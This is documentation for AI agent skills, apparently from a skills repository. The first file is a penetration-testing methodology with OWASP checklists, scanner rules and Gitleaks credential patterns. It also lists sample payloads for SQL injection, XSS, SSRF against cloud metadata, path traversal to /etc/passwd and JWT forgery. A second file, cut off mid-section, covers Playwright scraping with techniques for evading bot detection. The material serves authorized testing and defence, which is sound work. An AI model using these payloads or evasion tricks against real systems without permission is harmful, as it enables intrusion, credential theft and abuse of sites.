- [API Security Testing](#api-security-testing)
- [Web Vulnerability Testing](#web-vulnerability-testing)
- [Infrastructure Security](#infrastructure-security)
- [Pen Test Report Generation](#pen-test-report-generation)
- [Responsible Disclosure Workflow](#responsible-disclosure-workflow)
- [Workflows](#workflows)
- [Anti-Patterns](#anti-patterns)
- [Cross-References](#cross-references)
---
## Overview
### What This Skill Does
This skill provides the methodology, checklists, and automation for **offensive security testing** — actively probing systems to discover exploitable vulnerabilities. It covers web applications, APIs, infrastructure, and supply chain security.
### Distinction from Other Security Skills
| Skill | Focus | Approach |
|-------|-------|----------|
| **security-pen-testing** (this) | Finding vulnerabilities | Offensive — simulate attacker techniques |
| senior-secops | Security operations | Defensive — monitoring, incident response, SIEM |
| senior-security | Security policy | Governance — policies, frameworks, risk registers |
| skill-security-auditor | CI/CD gates | Automated — pre-merge security checks |
### Prerequisites
All testing described here assumes **written authorization** from the system owner. Unauthorized testing is illegal under the CFAA and equivalent laws worldwide. Always obtain a signed scope-of-work or rules-of-engagement document before starting.
---
## OWASP Top 10 Systematic Audit
Use the vulnerability scanner tool for automated checklist generation:
```bash
# Generate OWASP checklist for a web application
python scripts/vulnerability_scanner.py --target web --scope full
# Quick API-focused scan
python scripts/vulnerability_scanner.py --target api --scope quick --json
```
### A01:2021 — Broken Access Control
**Test Procedures:**
1. Attempt horizontal privilege escalation: access another user's resources by changing IDs
2. Test vertical escalation: access admin endpoints with regular user tokens
3. Verify CORS configuration — check `Access-Control-Allow-Origin` for wildcards
4. Test forced browsing to admin pages (`/admin`, `/api/admin`, `/debug`)
5. Modify JWT claims (`role`, `is_admin`) and replay tokens
**What to Look For:**
- Missing authorization checks on API endpoints
- Predictable resource IDs (sequential integers vs. UUIDs)
- Client-side only access controls (hidden UI elements without server checks)
- CORS misconfigurations allowing arbitrary origins
### A02:2021 — Cryptographic Failures
**Test Procedures:**
1. Check TLS version — reject anything below TLS 1.2
2. Verify password hashing: bcrypt/scrypt/argon2 with adequate cost factor
3. Look for sensitive data in URLs (tokens in query params get logged)
4. Check for hardcoded encryption keys in source code
5. Test for weak random number generation (Math.random() for tokens)
**What to Look For:**
- MD5/SHA1 used for password hashing
- Secrets in environment variables without encryption at rest
- Missing `Strict-Transport-Security` header
- Self-signed certificates in production
### A03:2021 — Injection
**Test Procedures:**
1. SQL injection: test all input fields with `' OR 1=1--` and time-based payloads
2. NoSQL injection: test with `{"$gt": ""}` and `{"$ne": null}` in JSON bodies
3. Command injection: test inputs with `; whoami` and backtick substitution
4. LDAP injection: test with `*)(uid=*))(|(uid=*`
5. Template injection: test with `{{7*7}}` and `${7*7}`
**What to Look For:**
- String concatenation in SQL queries
- User input passed to `eval()`, `exec()`, `os.system()`
- Unparameterized ORM queries
- Template engines rendering user input without sandboxing
### A04:2021 — Insecure Design
**Test Procedures:**
1. Review business logic flows for abuse scenarios (e.g., negative quantities in carts)
2. Check rate limiting on sensitive operations (login, password reset, OTP)
3. Test multi-step flows for state manipulation (skip payment step)
4. Verify security questions aren't guessable
**What to Look For:**
- Missing rate limits on authentication endpoints
- Business logic that trusts client-side calculations
- Lack of account lockout after failed attempts
- Missing CAPTCHA on public-facing forms
### A05:2021 — Security Misconfiguration
**Test Procedures:**
1. Check for default credentials on admin panels
2. Verify unnecessary HTTP methods are disabled (TRACE, DELETE on public endpoints)
3. Check error handling — stack traces should never leak to users
4. Review HTTP security headers (CSP, X-Frame-Options, X-Content-Type-Options)
5. Check directory listing is disabled
**What to Look For:**
- Debug mode enabled in production
- Default admin:admin credentials
- Verbose error messages with stack traces
- Missing security headers
### A06:2021 — Vulnerable and Outdated Components
**Test Procedures:**
1. Run dependency audit against known CVE databases
2. Check for end-of-life frameworks and libraries
3. Verify transitive dependency versions
4. Check for known vulnerable versions (e.g., Log4j 2.0-2.14.1)
```bash
# Audit a package manifest
python scripts/dependency_auditor.py --file package.json --severity high
python scripts/dependency_auditor.py --file requirements.txt --json
```
### A07:2021 — Identification and Authentication Failures
**Test Procedures:**
1. Test brute force protection on login endpoints
2. Check password policy enforcement (minimum length, complexity)
3. Verify session invalidation on logout and password change
4. Test "remember me" token security (HttpOnly, Secure, SameSite flags)
5. Check multi-factor authentication bypass paths
**What to Look For:**
- Sessions that persist after logout
- Missing `HttpOnly` and `Secure` flags on session cookies
- Password reset tokens that don't expire
- Username enumeration via different error messages
### A08:2021 — Software and Data Integrity Failures
**Test Procedures:**
1. Check for unsigned updates or deployment artifacts
2. Verify CI/CD pipeline integrity (signed commits, protected branches)
3. Test deserialization endpoints with crafted payloads
4. Check for SRI (Subresource Integrity) on CDN-loaded scripts
**What to Look For:**
- Unsafe deserialization of user input (pickle, Java serialization)
- Missing integrity checks on downloaded artifacts
- CI/CD pipelines running untrusted code
- CDN scripts without SRI hashes
### A09:2021 — Security Logging and Monitoring Failures
**Test Procedures:**
1. Verify authentication events are logged (success and failure)
2. Check that logs don't contain sensitive data (passwords, tokens, PII)
3. Test alerting thresholds (do 50 failed logins trigger an alert?)
4. Verify log integrity — can an attacker tamper with logs?
**What to Look For:**
- Missing audit trail for admin actions
- Passwords or tokens appearing in logs
- No alerting on suspicious patterns
- Logs stored without integrity protection
### A10:2021 — Server-Side Request Forgery (SSRF)
**Test Procedures:**
1. Test URL input fields with internal addresses (`http://169.254.169.254/` for cloud metadata)
2. Check for open redirect chains that reach internal services
3. Test with DNS rebinding payloads
4. Verify allowlist validation on outbound requests
**What to Look For:**
- User-controlled URLs passed to `fetch()`, `requests.get()`, `curl`
- Missing allowlist on outbound HTTP requests
- Ability to reach cloud metadata endpoints (AWS, GCP, Azure)
- PDF generators or screenshot services that fetch arbitrary URLs
---
## Static Analysis
### CodeQL Custom Rules
Write custom CodeQL queries for project-specific vulnerability patterns:
```ql
/**
* Detect SQL injection via string concatenation
*/
import python
import semmle.python.dataflow.new.DataFlow
from Call call, StringFormatting fmt
where
call.getFunc().getName() = "execute" and
fmt = call.getArg(0) and
exists(DataFlow::Node source |
source.asExpr() instanceof Name and
DataFlow::localFlow(source, DataFlow::exprNode(fmt.getAnOperand()))
)
select call, "Potential SQL injection: user input flows into execute()"
```
### Semgrep Custom Rules
Create project-specific Semgrep rules:
```yaml
rules:
- id: hardcoded-jwt-secret
pattern: |
jwt.encode($PAYLOAD, "...", ...)
message: "JWT signed with hardcoded secret"
severity: ERROR
languages: [python]
- id: unsafe-yaml-load
pattern: yaml.load($DATA)
fix: yaml.safe_load($DATA)
message: "Use yaml.safe_load() to prevent arbitrary code execution"
severity: WARNING
languages: [python]
- id: express-no-helmet
pattern: |
const app = express();
...
app.listen(...)
pattern-not: |
const app = express();
...
app.use(helmet(...));
...
app.listen(...)
message: "Express app missing helmet middleware for security headers"
severity: WARNING
languages: [javascript, typescript]
```
### ESLint Security Plugins
Recommended configuration:
```json
{
"plugins": ["security", "no-unsanitized"],
"extends": ["plugin:security/recommended"],
"rules": {
"security/detect-object-injection": "error",
"security/detect-non-literal-regexp": "warn",
"security/detect-unsafe-regex": "error",
"security/detect-buffer-noassert": "error",
"security/detect-eval-with-expression": "error",
"no-unsanitized/method": "error",
"no-unsanitized/property": "error"
}
}
```
---
## Dependency Vulnerability Scanning
### Ecosystem-Specific Commands
```bash
# Node.js
npm audit --json | jq '.vulnerabilities | to_entries[] | select(.value.severity == "critical")'
# Python
pip audit --format json --desc
safety check --json
# Go
govulncheck ./...
# Ruby
bundle audit check --update
```
### CVE Triage Workflow
1. **Collect**: Run ecosystem audit tools, aggregate findings
2. **Deduplicate**: Group by CVE ID across direct and transitive deps
3. **Score**: Use CVSS base score + environmental adjustments
4. **Prioritize**: Critical + exploitable + reachable = fix immediately
5. **Remediate**: Upgrade, patch, or mitigate with compensating controls
6. **Verify**: Rerun audit to confirm fix, update lock files
```bash
# Use the dependency auditor for automated triage
python scripts/dependency_auditor.py --file package.json --severity critical --json
```
### Known Vulnerable Patterns
| Package | Vulnerable Versions | CVE | Impact |
|---------|-------------------|-----|--------|
| log4j-core | 2.0 - 2.14.1 | CVE-2021-44228 | RCE via JNDI injection |
| lodash | < 4.17.21 | CVE-2021-23337 | Prototype pollution |
| axios | < 1.6.0 | CVE-2023-45857 | CSRF token exposure |
| pillow | < 9.3.0 | CVE-2022-45198 | DoS via crafted image |
| express | < 4.19.2 | CVE-2024-29041 | Open redirect |
---
## Secret Scanning
### TruffleHog Patterns
```bash
# Scan git history for secrets
trufflehog git file://. --only-verified --json
# Scan filesystem (no git history)
trufflehog filesystem . --json
```
### Gitleaks Configuration
```toml
# .gitleaks.toml
title = "Custom Gitleaks Config"
[[rules]]
id = "aws-access-key"
description = "AWS Access Key ID"
regex = '''AKIA[0-9A-Z]{16}'''
tags = ["aws", "credentials"]
[[rules]]
id = "generic-api-key"
description = "Generic API Key"
regex = '''(?i)(api[_-]?key|apikey)\s*[:=]\s*['\"][a-zA-Z0-9]{20,}['\"]'''
tags = ["api", "key"]
[[rules]]
id = "private-key"
description = "Private Key Header"
regex = '''-----BEGIN (RSA|EC|DSA|OPENSSH) PRIVATE KEY-----'''
tags = ["private-key"]
[allowlist]
paths = ['''\.test\.''', '''_test\.go''', '''mock''', '''fixture''']
```
### Pre-commit Hook Integration
```yaml
# .pre-commit-config.yaml
repos:
- repo: https://github.com/gitleaks/gitleaks
rev: v8.18.0
hooks:
- id: gitleaks
- repo: https://github.com/trufflesecurity/trufflehog
rev: v3.63.0
hooks:
- id: trufflehog
args: ["git", "file://.", "--since-commit", "HEAD", "--only-verified"]
```
### CI Integration (GitHub Actions)
```yaml
name: Secret Scan
on: [push, pull_request]
jobs:
scan:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
with:
fetch-depth: 0
- uses: trufflesecurity/trufflehog@main
with:
extra_args: --only-verified
```
---
## API Security Testing
### Authentication Bypass
**JWT Manipulation:**
1. Decode token at jwt.io — inspect claims without verification
2. Change `alg` to `none` and remove signature: `eyJ...payload.`
3. Change `alg` from RS256 to HS256 and sign with the public key
4. Modify claims (`role: "admin"`, `exp: 9999999999`) and re-sign with weak secrets
5. Test key confusion: HMAC signed with RSA public key bytes
**Session Fixation:**
1. Obtain a session token before authentication
2. Authenticate — check if the session ID changes
3. If the same session ID persists, the app is vulnerable to session fixation
### Authorization Flaws
**IDOR (Insecure Direct Object Reference):**
```
GET /api/users/123/profile → 200 (your profile)
GET /api/users/124/profile → 200 (someone else's profile — IDOR!)
GET /api/users/124/profile → 403 (properly protected)
```
Test pattern: Change numeric IDs, UUIDs, slugs in every endpoint. Use Burp Intruder or a simple script to iterate.
**BOLA (Broken Object Level Authorization):**
Same as IDOR but specifically in REST APIs. Test every CRUD operation:
- Can user A read user B's resource?
- Can user A update user B's resource?
- Can user A delete user B's resource?
**BFLA (Broken Function Level Authorization):**
```
# Regular user tries admin endpoints
POST /api/admin/users → Should be 403
DELETE /api/admin/users/123 → Should be 403
PUT /api/settings/global → Should be 403
```
### Rate Limiting Validation
Test rate limits on critical endpoints:
```bash
# Rapid-fire login attempts
for i in $(seq 1 100); do
curl -s -o /dev/null -w "%{http_code}" \
-X POST https://target.com/api/login \
-d '{"email":"test@test.com","password":"wrong"}';
done
# Expect: 429 after threshold (typically 5-10 attempts)
```
### Mass Assignment Detection
```bash
# Try adding admin fields to a regular update request
PUT /api/users/profile
{
"name": "Normal User",
"email": "user@test.com",
"role": "admin", # mass assignment attempt
"is_verified": true, # mass assignment attempt
"subscription": "enterprise" # mass assignment attempt
}
```
### GraphQL-Specific Testing
**Introspection Query:**
```graphql
{
__schema {
types { name fields { name type { name } } }
}
}
```
Introspection should be **disabled in production**.
**Query Depth Attack:**
```graphql
{
user(id: 1) {
friends {
friends {
friends {
friends { # Keep nesting until server crashes
name
}
}
}
}
}
}
```
**Batching Attack:**
```json
[
{"query": "mutation { login(user:\"admin\", pass:\"password1\") { token } }"},
{"query": "mutation { login(user:\"admin\", pass:\"password2\") { token } }"},
{"query": "mutation { login(user:\"admin\", pass:\"password3\") { token } }"}
]
```
Batch mutations can bypass rate limiting if counted as a single request.
---
## Web Vulnerability Testing
### XSS (Cross-Site Scripting)
**Reflected XSS Test Payloads** (non-destructive):
```
<script>alert(document.domain)</script>
"><img src=x onerror=alert(document.domain)>
javascript:alert(document.domain)
<svg onload=alert(document.domain)>
'-alert(document.domain)-'
</script><script>alert(document.domain)</script>
```
**Stored XSS**: Submit payloads in persistent fields (comments, profiles, messages), then check if they render for other users.
**DOM-Based XSS**: Look for `innerHTML`, `document.write()`, `eval()` operating on `location.hash`, `location.search`, or `document.referrer`.
### CSRF Token Validation
1. Capture a legitimate request with CSRF token
2. Replay the request without the token — should fail (403)
3. Replay with a token from a different session — should fail
4. Check if token changes per request or is static per session
5. Verify `SameSite` cookie attribute is set to `Strict` or `Lax`
### SQL Injection
**Detection Payloads** (safe, non-destructive):
```
' OR '1'='1
' OR '1'='1' --
" OR "1"="1
1 OR 1=1
' UNION SELECT NULL--
' AND SLEEP(5)-- (time-based blind)
' AND 1=1-- (boolean-based blind)
```
**Union-Based Enumeration** (authorized testing only):
```sql
' UNION SELECT 1,2,3-- -- Find column count
' UNION SELECT table_name,2,3 FROM information_schema.tables--
' UNION SELECT column_name,2,3 FROM information_schema.columns WHERE table_name='users'--
```
**Time-Based Blind:**
```sql
' AND IF(1=1, SLEEP(5), 0)-- -- MySQL
' AND pg_sleep(5)-- -- PostgreSQL
' WAITFOR DELAY '0:0:5'-- -- MSSQL
```
### SSRF Detection
**Payloads for SSRF testing:**
```
http://127.0.0.1
http://localhost
http://169.254.169.254/latest/meta-data/ (AWS metadata)
http://metadata.google.internal/ (GCP metadata)
http://169.254.169.254/metadata/instance (Azure metadata)
http://[::1] (IPv6 localhost)
http://0x7f000001 (hex encoding)
http://2130706433 (decimal encoding)
```
### Path Traversal
```
GET /api/files?name=../../../etc/passwd
GET /api/files?name=....//....//....//etc/passwd
GET /api/files?name=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
GET /api/files?name=..%252f..%252f..%252fetc%252fpasswd (double encoding)
```
---
## Infrastructure Security
### Misconfigured Cloud Storage
**S3 Bucket Checks:**
```bash
# Check for public read access
aws s3 ls s3://target-bucket --no-sign-request
# Check bucket policy
aws s3api get-bucket-policy --bucket target-bucket
# Check ACL
aws s3api get-bucket-acl --bucket target-bucket
```
**Common Bucket Name Patterns:**
```
{company}-backup, {company}-dev, {company}-staging
{company}-assets, {company}-uploads, {company}-logs
```
### HTTP Security Headers
Required headers and expected values:
| Header | Expected Value |
|--------|---------------|
| `Strict-Transport-Security` | `max-age=31536000; includeSubDomains; preload` |
| `Content-Security-Policy` | Restrictive policy, no `unsafe-inline` or `unsafe-eval` |
| `X-Content-Type-Options` | `nosniff` |
| `X-Frame-Options` | `DENY` or `SAMEORIGIN` |
| `Referrer-Policy` | `strict-origin-when-cross-origin` |
| `Permissions-Policy` | Restrict camera, microphone, geolocation |
| `X-XSS-Protection` | `0` (deprecated, CSP is preferred) |
### TLS Configuration
```bash
# Check TLS version and cipher suites
nmap --script ssl-enum-ciphers -p 443 target.com
# Quick check with testssl.sh
./testssl.sh target.com
# Check certificate expiry
echo | openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -noout -dates
```
**Reject:** TLS 1.0, TLS 1.1, RC4, DES, 3DES, MD5 in cipher suites, CBC mode ciphers (BEAST), export-grade ciphers.
### Open Port Scanning
```bash
# Quick top-1000 ports
nmap -sV target.com
# Full port scan
nmap -p- -sV target.com
# Common dangerous open ports
# 21 (FTP), 23 (Telnet), 445 (SMB), 3389 (RDP), 6379 (Redis), 27017 (MongoDB)
```
---
## Pen Test Report Generation
Generate professional reports from structured findings:
```bash
# Generate markdown report from findings JSON
python scripts/pentest_report_generator.py --findings findings.json --format md --output report.md
# Generate JSON report
python scripts/pentest_report_generator.py --findings findings.json --format json --output report.json
```
### Findings JSON Format
```json
[
{
"title": "SQL Injection in Login Endpoint",
"severity": "critical",
"cvss_score": 9.8,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"category": "A03:2021 - Injection",
"description": "The /api/login endpoint is vulnerable to SQL injection via the email parameter.",
"evidence": "Request: POST /api/login {\"email\": \"' OR 1=1--\", \"password\": \"x\"}\nResponse: 200 OK with admin session token",
"impact": "Full database access, authentication bypass, potential remote code execution",
"remediation": "Use parameterized queries. Replace string concatenation with prepared statements.",
"references": ["https://cwe.mitre.org/data/definitions/89.html"]
}
]
```
### Report Structure
1. **Executive Summary**: Business impact, overall risk level, top 3 findings
2. **Scope**: What was tested, what was excluded, testing dates
3. **Methodology**: Tools used, testing approach (black/gray/white box)
4. **Findings Table**: Sorted by severity with CVSS scores
5. **Detailed Findings**: Each with description, evidence, impact, remediation
6. **Remediation Priority Matrix**: Effort vs. impact for each fix
7. **Appendix**: Raw tool output, full payload lists
---
## Responsible Disclosure Workflow
Responsible disclosure is **mandatory** for any vulnerability found during authorized testing or independent research. See `references/responsible_disclosure.md` for full templates.
### Timeline
| Day | Action |
|-----|--------|
| 0 | Discovery — document finding with evidence |
| 1 | Report to vendor via security contact or bug bounty program |
| 7 | Follow up if no acknowledgment received |
| 30 | Request status update and remediation timeline |
| 60 | Second follow-up — offer technical assistance |
| 90 | Public disclosure (with or without fix, per industry standard) |
### Key Principles
1. **Never exploit beyond proof of concept** — demonstrate impact without causing damage
2. **Encrypt all communications** — PGP/GPG for email, secure channels for details
3. **Do not access, modify, or exfiltrate real user data** — use your own test accounts
4. **Document everything** — timestamps, screenshots, request/response pairs
5. **Respect the vendor's timeline** — extend deadline if they're actively working on a fix
---
## Workflows
### Workflow 1: Quick Security Check (15 Minutes)
For pre-merge reviews or quick health checks:
```bash
# 1. Generate OWASP checklist
python scripts/vulnerability_scanner.py --target web --scope quick
# 2. Scan dependencies
python scripts/dependency_auditor.py --file package.json --severity high
# 3. Check for secrets in recent commits
# (Use gitleaks or trufflehog as described in Secret Scanning section)
# 4. Review HTTP security headers
curl -sI https://target.com | grep -iE "(strict-transport|content-security|x-frame|x-content-type)"
```
**Decision**: If any critical or high findings, block the merge.
### Workflow 2: Full Penetration Test (Multi-Day Assessment)
**Day 1 — Reconnaissance:**
1. Map the attack surface: endpoints, authentication flows, third-party integrations
2. Run automated OWASP checklist (full scope)
3. Run dependency audit across all manifests
4. Run secret scan on full git history
**Day 2 — Manual Testing:**
1. Test authentication and authorization (IDOR, BOLA, BFLA)
2. Test injection points (SQLi, XSS, SSRF, command injection)
3. Test business logic flaws
4. Test API-specific vulnerabilities (GraphQL, rate limiting, mass assignment)
**Day 3 — Infrastructure and Reporting:**
1. Check cloud storage permissions
2. Verify TLS configuration and security headers
3. Port scan for unnecessary services
4. Compile findings into structured JSON
5. Generate pen test report
```bash
# Generate final report
python scripts/pentest_report_generator.py --findings findings.json --format md --output pentest-report.md
```
### Workflow 3: CI/CD Security Gate
Automated security checks that run on every pull request:
```yaml
# .github/workflows/security-gate.yml
name: Security Gate
on: [pull_request]
jobs:
security:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
with:
fetch-depth: 0
# Secret scanning
- name: Scan for secrets
uses: trufflesecurity/trufflehog@main
with:
extra_args: --only-verified
# Dependency audit
- name: Audit dependencies
run: |
npm audit --audit-level=high
pip audit --desc
# SAST
- name: Static analysis
uses: returntocorp/semgrep-action@v1
with:
config: >-
p/security-audit
p/secrets
p/owasp-top-ten
# Security headers check (staging only)
- name: Check security headers
if: github.base_ref == 'staging'
run: |
curl -sI $STAGING_URL | python scripts/vulnerability_scanner.py --target web --scope quick
```
**Gate Policy**: Block merge on critical/high findings. Warn on medium. Log low/info.
---
## Anti-Patterns
1. **Testing in production without authorization** — Always get written permission and use staging/test environments when possible
2. **Ignoring low-severity findings** — Low findings compound; a chain of lows can become a critical exploit path
3. **Skipping responsible disclosure** — Every vulnerability found must be reported through proper channels
4. **Relying solely on automated tools** — Tools miss business logic flaws, chained exploits, and novel attack vectors
5. **Testing without a defined scope** — Scope creep leads to legal liability; document what is and isn't in scope
6. **Reporting without remediation guidance** — Every finding must include actionable remediation steps
7. **Storing evidence insecurely** — Pen test evidence (screenshots, payloads, tokens) is sensitive; encrypt and restrict access
8. **One-time testing** — Security testing must be continuous; integrate into CI/CD and schedule periodic assessments
---
## Cross-References
| Skill | Relationship |
|-------|-------------|
| [senior-secops](https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/senior-secops/SKILL.md) | Defensive security operations — monitoring, incident response, SIEM configuration |
| [senior-security](https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/senior-security/SKILL.md) | Security policy and governance — frameworks, risk registers, compliance |
| [dependency-auditor](https://github.com/alirezarezvani/claude-skills/tree/main/engineering/dependency-auditor/SKILL.md) | Deep supply chain security — SBOMs, license compliance, transitive risk |
| [code-reviewer](https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/code-reviewer/SKILL.md) | Code review practices — includes security review checklist |

View File

@@ -0,0 +1,575 @@
---
title: "Browser Automation — Agent Skill for Codex & OpenClaw"
description: "Use when the user asks to automate browser tasks, scrape websites, fill forms, capture screenshots, extract structured data from web pages, or build. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw."
---
# Browser Automation
<div class="page-meta" markdown>
<span class="meta-badge">:material-rocket-launch: Engineering - POWERFUL</span>
<span class="meta-badge">:material-identifier: `browser-automation`</span>
<span class="meta-badge">:material-github: <a href="https://github.com/alirezarezvani/claude-skills/tree/main/engineering/browser-automation/SKILL.md">Source</a></span>
</div>
<div class="install-banner" markdown>
<span class="install-label">Install:</span> <code>claude /plugin install engineering-advanced-skills</code>
</div>
## Overview
The Browser Automation skill provides comprehensive tools and knowledge for building production-grade web automation workflows using Playwright. This skill covers data extraction, form filling, screenshot capture, session management, and anti-detection patterns for reliable browser automation at scale.
**When to use this skill:**
- Scraping structured data from websites (tables, listings, search results)
- Automating multi-step browser workflows (login, fill forms, download files)
- Capturing screenshots or PDFs of web pages
- Extracting data from SPAs and JavaScript-heavy sites
- Building repeatable browser-based data pipelines
**When NOT to use this skill:**
- Writing browser tests or E2E test suites — use **playwright-pro** instead
- Testing API endpoints — use **api-test-suite-builder** instead
- Load testing or performance benchmarking — use **performance-profiler** instead
**Why Playwright over Selenium or Puppeteer:**
- **Auto-wait built in** — no explicit `sleep()` or `waitForElement()` needed for most actions
- **Multi-browser from one API** — Chromium, Firefox, WebKit with zero config changes
- **Network interception** — block ads, mock responses, capture API calls natively
- **Browser contexts** — isolated sessions without spinning up new browser instances
- **Codegen** — `playwright codegen` records your actions and generates scripts
- **Async-first** — Python async/await for high-throughput scraping
## Core Competencies
### 1. Web Scraping Patterns
#### DOM Extraction with CSS Selectors
CSS selectors are the primary tool for element targeting. Prefer them over XPath for readability and performance.
**Selector priority (most to least reliable):**
1. `data-testid`, `data-id`, or custom data attributes — stable across redesigns
2. `#id` selectors — unique but may change between deploys
3. Semantic selectors: `article`, `nav`, `main`, `section` — resilient to CSS changes
4. Class-based: `.product-card`, `.price` — brittle if classes are generated (e.g., CSS modules)
5. Positional: `nth-child()`, `nth-of-type()` — last resort, breaks on layout changes
**Compound selectors for precision:**
```python
# Product cards within a specific container
page.query_selector_all("div.search-results > article.product-card")
# Price inside a product card (scoped)
card.query_selector("span[data-field='price']")
# Links with specific text content
page.locator("a", has_text="Next Page")
```
#### XPath for Complex Traversal
Use XPath only when CSS cannot express the relationship:
```python
# Find element by text content (XPath strength)
page.locator("//td[contains(text(), 'Total')]/following-sibling::td[1]")
# Navigate up the DOM tree
page.locator("//span[@class='price']/ancestor::div[@class='product']")
```
#### Pagination Patterns
- **Next-button pagination**: Click "Next" until disabled or absent
- **URL-based pagination**: Increment `?page=N` or `&offset=N` in URL
- **Infinite scroll**: Scroll to bottom, wait for new content, repeat until no change
- **Load-more button**: Click button, wait for DOM mutation, repeat
#### Infinite Scroll Handling
```python
async def scroll_to_bottom(page, max_scrolls=50, pause_ms=1500):
previous_height = 0
for i in range(max_scrolls):
current_height = await page.evaluate("document.body.scrollHeight")
if current_height == previous_height:
break
await page.evaluate("window.scrollTo(0, document.body.scrollHeight)")
await page.wait_for_timeout(pause_ms)
previous_height = current_height
return i + 1 # number of scrolls performed
```
### 2. Form Filling & Multi-Step Workflows
#### Login Flows
```python
async def login(page, url, username, password):
await page.goto(url)
await page.fill("input[name='username']", username)
await page.fill("input[name='password']", password)
await page.click("button[type='submit']")
# Wait for navigation to complete (post-login redirect)
await page.wait_for_url("**/dashboard**")
```
#### Multi-Page Forms
Break multi-step forms into discrete functions per step. Each function:
1. Fills the fields for that step
2. Clicks the "Next" or "Continue" button
3. Waits for the next step to load (URL change or DOM element)
```python
async def fill_step_1(page, data):
await page.fill("#first-name", data["first_name"])
await page.fill("#last-name", data["last_name"])
await page.select_option("#country", data["country"])
await page.click("button:has-text('Continue')")
await page.wait_for_selector("#step-2-form")
async def fill_step_2(page, data):
await page.fill("#address", data["address"])
await page.fill("#city", data["city"])
await page.click("button:has-text('Continue')")
await page.wait_for_selector("#step-3-form")
```
#### File Uploads
```python
# Single file
await page.set_input_files("input[type='file']", "/path/to/file.pdf")
# Multiple files
await page.set_input_files("input[type='file']", [
"/path/to/file1.pdf",
"/path/to/file2.pdf"
])
# Drag-and-drop upload zones (no visible input element)
async with page.expect_file_chooser() as fc_info:
await page.click("div.upload-zone")
file_chooser = await fc_info.value
await file_chooser.set_files("/path/to/file.pdf")
```
#### Dropdown and Select Handling
```python
# Native <select> element
await page.select_option("#country", value="US")
await page.select_option("#country", label="United States")
# Custom dropdown (div-based)
await page.click("div.dropdown-trigger")
await page.click("div.dropdown-option:has-text('United States')")
```
### 3. Screenshot & PDF Capture
#### Screenshot Strategies
```python
# Full page (scrolls automatically)
await page.screenshot(path="full-page.png", full_page=True)
# Viewport only (what's visible)
await page.screenshot(path="viewport.png")
# Specific element
element = page.locator("div.chart-container")
await element.screenshot(path="chart.png")
# With custom viewport for consistency
context = await browser.new_context(viewport={"width": 1920, "height": 1080})
```
#### PDF Generation
```python
# Only works in Chromium
await page.pdf(
path="output.pdf",
format="A4",
margin={"top": "1cm", "right": "1cm", "bottom": "1cm", "left": "1cm"},
print_background=True
)
```
#### Visual Regression Baselines
Take screenshots at known states and compare pixel-by-pixel. Store baselines in version control. Use naming conventions: `{page}_{viewport}_{state}.png`.
### 4. Structured Data Extraction
#### Tables to JSON
```python
async def extract_table(page, selector):
headers = await page.eval_on_selector_all(
f"{selector} thead th",
"elements => elements.map(e => e.textContent.trim())"
)
rows = await page.eval_on_selector_all(
f"{selector} tbody tr",
"""rows => rows.map(row => {
return Array.from(row.querySelectorAll('td'))
.map(cell => cell.textContent.trim())
})"""
)
return [dict(zip(headers, row)) for row in rows]
```
#### Listings to Arrays
```python
async def extract_listings(page, container_sel, field_map):
"""
field_map example: {"title": "h3.title", "price": "span.price", "url": "a::attr(href)"}
"""
items = []
cards = await page.query_selector_all(container_sel)
for card in cards:
item = {}
for field, sel in field_map.items():
if "::attr(" in sel:
attr_sel, attr_name = sel.split("::attr(")
attr_name = attr_name.rstrip(")")
el = await card.query_selector(attr_sel)
item[field] = await el.get_attribute(attr_name) if el else None
else:
el = await card.query_selector(sel)
item[field] = (await el.text_content()).strip() if el else None
items.append(item)
return items
```
#### Nested Data Extraction
For threaded content (comments with replies), use recursive extraction:
```python
async def extract_comments(page, parent_selector):
comments = []
elements = await page.query_selector_all(f"{parent_selector} > .comment")
for el in elements:
text = await (await el.query_selector(".comment-body")).text_content()
author = await (await el.query_selector(".author")).text_content()
replies = await extract_comments(el, ".replies")
comments.append({
"author": author.strip(),
"text": text.strip(),
"replies": replies
})
return comments
```
### 5. Cookie & Session Management
#### Save and Restore Sessions
```python
import json
# Save cookies after login
cookies = await context.cookies()
with open("session.json", "w") as f:
json.dump(cookies, f)
# Restore session in new context
with open("session.json", "r") as f:
cookies = json.load(f)
context = await browser.new_context()
await context.add_cookies(cookies)
```
#### Storage State (Cookies + Local Storage)
```python
# Save full state (cookies + localStorage + sessionStorage)
await context.storage_state(path="state.json")
# Restore full state
context = await browser.new_context(storage_state="state.json")
```
**Best practice:** Save state after login, reuse across scraping sessions. Check session validity before starting a long job — make a lightweight request to a protected page and verify you are not redirected to login.
### 6. Anti-Detection Patterns
Modern websites detect automation through multiple vectors. Address all of them:
#### User Agent Rotation
Never use the default Playwright user agent. Rotate through real browser user agents:
```python
USER_AGENTS = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
]
```
#### Viewport and Screen Size
Set realistic viewport dimensions. The default 800x600 is a red flag:
```python
context = await browser.new_context(
viewport={"width": 1920, "height": 1080},
screen={"width": 1920, "height": 1080},
user_agent=random.choice(USER_AGENTS),
)
```
#### WebDriver Flag Removal
Playwright sets `navigator.webdriver = true`. Remove it:
```python
await page.add_init_script("""
Object.defineProperty(navigator, 'webdriver', {get: () => undefined});
""")
```
#### Request Throttling
Add human-like delays between actions:
```python
import random
async def human_delay(min_ms=500, max_ms=2000):
delay = random.randint(min_ms, max_ms)
await page.wait_for_timeout(delay)
```
#### Proxy Support
```python
browser = await playwright.chromium.launch(
proxy={"server": "http://proxy.example.com:8080"}
)
# Or per-context:
context = await browser.new_context(
proxy={"server": "http://proxy.example.com:8080",
"username": "user", "password": "pass"}
)
```
### 7. Dynamic Content Handling
#### SPA Rendering
